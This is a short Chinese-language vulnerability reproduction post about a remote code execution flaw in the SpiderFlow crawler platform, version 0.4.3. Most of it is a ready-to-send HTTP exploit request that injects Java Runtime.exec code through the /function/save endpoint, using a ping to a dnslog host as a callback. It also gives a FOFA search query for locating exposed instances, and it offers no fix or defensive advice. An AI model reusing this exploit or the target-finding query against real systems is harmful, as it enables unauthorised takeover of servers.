0x01 前言
SpiderFlow是ssssssss-team开源的一个爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。该系统存在RCE漏洞,攻击者构造恶意命令能够利用该漏洞获取服务器权限,导致服务器沦陷。
0x02 漏洞影响
影响版本
Spider-Flow 0.4.3
0x03 漏洞利用
EXP如下:
POST /function/save HTTP/1.1
Host: ip:port
Content-Length: 117
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+0gj0v8.dnslog.cn')%3B%7B
0x04 fofa语句
app="SpiderFlow"
******************************************************************************************
喜欢就点点收藏和关注,如何多人喜欢的话,我尽量日更最新漏洞的复现!!
******************************************************************************************